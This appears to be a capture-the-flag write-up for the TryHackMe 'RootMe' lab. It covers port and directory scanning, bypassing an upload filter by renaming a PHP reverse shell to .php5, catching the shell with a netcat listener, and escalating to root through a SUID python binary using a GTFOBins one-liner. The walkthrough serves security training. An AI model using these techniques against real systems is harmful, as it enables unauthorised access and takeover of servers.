RootMe

Task 2: Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.166.228

We found 2 open ports, which is the answer to the first answer.

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.166.228

The version of Apache is 2.4.29 and the service running on port 22 is SSH. The answers to the next two questions.

To find hidden directories on a web server, we use the tool called Gobuster.

Command Breakdown:

  • (-w): Specifying wordlist

  • (-u): Specifying URL

  • (-x): Specifying extensions

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.166.228

We find 2 directories that are interesting, and the answer for the last question of this task is /panel/

Task 3: Getting a shell

It says we need to find a form to upload and get a reverse shell, from our gobuster output we can see that there is a directory called /uploads, which I think is a directory where uploaded files are stored. But first we need to find the upload page, and that can be found in the panel directory, when we visit it, we see the upload option.

Now we have to see if we can upload a php reverse shell (One from pentestmonkey's).

First we have to modify the script from when you first downloaded it. You have to change the $ip to your TryHackMe IP and the $port to the port you are listening on when you start your Netcat listener.

Once you changed it, try uploading it.

It looks like we are not allowed to upload php files. What we can do here is that we can add any number (I'm adding 5) to the name of the php file and it wont recognize that it is a php file while it actually is.

mv shell.php shell.php5

Now lets try uploading it.

And it was uploaded. Now lets go to the uploads directory where I think we can access our uploaded reverse shell.

And we surely can, but before we click it, we need to start a Netcat listener to capture the reverse shell.

nc -lvnp 1234

Once you click the shell.php5 link on the site, you will get a reverse shell.

You can go and find the user.txt which is the answer to the question in this task. But first lets try stabilizing our shell, we do that by using this command:

python -c 'import pty; pty.spawn("/bin/bash")'

And to get access to the clear command use this command:

export TERM=xterm-color

Now if you are struggling to find the user.txt file, there is a command that you can use to find it easily , its called find

Command Breakdown:

  • find: Using the find command

  • /: Searching through all directories

  • -type: Specifying file type, in this case a file (f)

  • -name: Specifying the name of the file , in this case user.txt

  • 2>/dev/null: Sending all error to /dev/null which is a file that does not contain anything, so it wont show any error to us.

find / -type f -name user.txt 2>/dev/null

Task 4: Privilege Escalation

The first question is asking us to find files with SUID permissions, we can find these by using this command:

Command Breakdown:

  • find: Using the find command

  • /: Searching through all directories

  • -perm: Specifying permission type, in case -u=s which is the permission to find SUID files.

  • -type: Specifying file type, in this case a file (f)

  • 2>/dev/null: Sending all error to /dev/null which is a file that does not contain anything, so it wont show any error to us.

find / -perm -u=s -type f 2>/dev/null

Looking through these , the one that catches my eye is/usr/bin/python, and that is the answer to the first question.

As we found a SUID permission file, we can go to GTFOBins and find commands that can help us escalate our privileges to root.

Use the second command and without the ./ and you should get root.

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Now you can find the final flag which is also the final question in this room in /root/ which you can now access as you are root.

Last updated